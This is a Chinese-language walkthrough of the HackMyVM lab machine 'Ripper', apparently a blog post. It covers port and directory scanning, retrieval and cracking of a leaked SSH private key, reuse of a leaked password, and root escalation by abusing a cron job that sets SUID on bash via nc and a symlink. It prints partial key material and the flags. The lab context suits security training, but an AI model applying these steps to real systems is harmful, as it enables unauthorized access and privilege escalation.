0x00 配置
攻击机 IP: 172.16.1.25
靶机 IP: 172.16.1.90
0x01 攻击
使用 Nmap 扫描目标靶机开放的端口
┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.90
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 172.16.1.90
Host is up (0.00055s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 0c3f13546e6ee656d291ebad9536c68d (RSA)
| 256 9be68e14397a17a38088cd772ec33b1a (ECDSA)
|_ 256 855a052a4bc0b236ea8ae28ab2efbcdf (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:17:6A:06 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.47 seconds
发现了 22(SSH) 和 80(HTTP) 端口。查看 Web 页面
Website in maintenance... Come back next month please.
网页和源码都没有任何提示。尝试扫描网站后台
┌──(root㉿Kali-VM)-[~]
└─# gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://172.16.1.90 -x php,txt,html
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.16.1.90
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 57]
/.html (Status: 403) [Size: 276]
/.html (Status: 403) [Size: 276]
/server-status (Status: 403) [Size: 276]
/staff_statements.txt (Status: 200) [Size: 107]
Progress: 878072 / 882244 (99.53%)
===============================================================
Finished
===============================================================
发现了一个可疑文件,staff_statements.txt。打开看看
The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.
提示我们技术员正在使用旧的 SSH 连接文件。最后在网站下找到了 id_rsa.bak
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABDZVZMVwo
cfZRVpSIfcOdmiAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDerPt4pwoQ
...
5fo7tGQ+DvUlyyLfk/UM4N8fsm+rsgkV84ogrTDn3CzMeBu6XY0+XWUbmhRL1/9yuWuU0D
By0QmXw3P/H1csxt8WRkuNygJz80o=
-----END OPENSSH PRIVATE KEY-----
得到了 SSH 私钥,尝试使用虚拟机登录页面的 "jack" 作为用户名登录
┌──(root㉿Kali-VM)-[~/work]
└─# ssh [email protected] -i id_rsa.bak
Enter passphrase for key 'id_rsa.bak':
发现私钥文件有密码。使用 john 破解,得到密码 bananas
。成功登录到 jack 用户
-bash-5.0$ pwd
/home/jack
-bash-5.0$ ls -al
total 32
drwx------ 4 jack jack 4096 May 23 02:18 .
drwxr-xr-x 4 root root 4096 May 26 2021 ..
lrwxrwxrwx 1 root root 9 May 26 2021 .bash_history -> /dev/null
-rw-r--r-- 1 jack jack 220 May 26 2021 .bash_logout
-rw-r--r-- 1 jack jack 3527 May 26 2021 .bashrc
drwxr-xr-x 3 jack jack 4096 May 26 2021 .local
-rw-r--r-- 1 jack jack 808 May 26 2021 .profile
drwx------ 2 jack jack 4096 May 26 2021 .ssh
-rw-r--r-- 1 jack jack 207 May 23 02:24 .wget-hsts
在 jack 用户的家目录下没有发现 user flag,看来需要继续提权
-bash-5.0$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
jack:x:1000:1000:,,,:/home/jack:/bin/bash
helder:x:1001:1001:,,,:/home/helder:/bin/bash
发现一个 helder 用户。但未找到 Sudo 或者 SUID 的提权方法。使用 linpeass.sh 脚本检查一下系统
═╣ Can I read opasswd file? .............
jack:Il0V3lipt0n1c3t3a
发现一个可疑的 opasswd。不过一开始我没注意到这个,而是用 pspy64 发现了一个计划任务
20XX/XX/XX XX:XX:XX CMD: UID=0 PID=13277 | /usr/sbin/CRON -f
20XX/XX/XX XX:XX:XX CMD: UID=0 PID=13278 | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi
20XX/XX/XX XX:XX:XX CMD: UID=0 PID=13279 | /bin/sh -c cd / && run-parts --report /etc/cron.hourly
这行命令是在做什么?
/bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi
- 创建 nc 监听在本地的 10000 端口上,每次只监听 1 秒
- 把 nc 监听到的输入重定向到 /root/.local/out
- 如果 /root/.local/helder.txt 和 /home/helder/passwd.txt 的内容一致,则对 nc 输入的东西赋予 SUID
多次尝试 nc 输入未果,猜测是上一个条件 /root/.local/helder.txt 和 /home/helder/passwd.txt 的内容不一致。不过闲杂还没有权限访问 /home/helder,更不要说 /root 了,所以这应该不是这步提权要用到的,应该是提权到 root 时用的
言归正传,尝试用刚才获得的密码 Il0V3lipt0n1c3t3a 登录 helder
-bash-5.0$ su - helder
Password:
-bash-5.0$ id
uid=1001(helder) gid=1001(helder) groups=1001(helder)
-bash-5.0$ whoami
helder
-bash-5.0$ ls -al
total 36
drwx------ 3 helder helder 4096 May 23 02:48 .
drwxr-xr-x 4 root root 4096 May 26 2021 ..
lrwxrwxrwx 1 root root 9 May 26 2021 .bash_history -> /dev/null
-rw-r--r-- 1 helder helder 220 May 26 2021 .bash_logout
-rw-r--r-- 1 helder helder 3659 May 26 2021 .bashrc
drwxr-xr-x 3 helder helder 4096 May 26 2021 .local
lrwxrwxrwx 1 helder helder 23 May 23 02:46 passwd.txt -> /root/.local/helder.txt
-rw-r--r-- 1 helder helder 940 May 26 2021 .profile
-rw-r--r-- 1 helder helder 5 May 23 02:48 root
-rwx------ 1 helder helder 33 May 26 2021 user.txt
-rw------- 1 helder helder 52 May 26 2021 .Xauthority
-bash-5.0$ cat user.txt
5c38d7d08c687355cb0ae3b6025cbe99
成功登录并获得了 user flag。接下来才是用到计划任务提权的地方。因为不知道 /root/.local/helder.txt 里到底是什么,所以我们直接创建一个软链接就行
-bash-5.0$ ln -s /root/.local/helder.txt /home/helder/passwd.txt
然后监听一下 10000 端口,并发送 "bash",来给 bash 加上 SUID
-bash-5.0$ echo "bash" > ncmsg
-bash-5.0$ nc -lnvp 10000 < ncmsg
等待一会之后 nc 运行完毕,bash 也被赋予了 SUID
-bash-5.0$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/su
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/mount
/usr/bin/bash
/usr/bin/umount
/usr/bin/chsh
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
然后使用 bash -p 命令即可提权
-bash-5.0$ id
uid=1001(helder) gid=1001(helder) groups=1001(helder)
-bash-5.0$ bash -p
bash-5.0# id
uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)
最后获得 root flag
bash-5.0# cat /root/root.txt
e28f578a17a5f99c0381c4b689d96f9f
0x02 总结
找 helder 的密码的时候走了一些弯路
标签:May,HMV,Ripper,jack,helder,txt,root,bash From: https://www.cnblogs.com/azwhikaru/p/17422358.html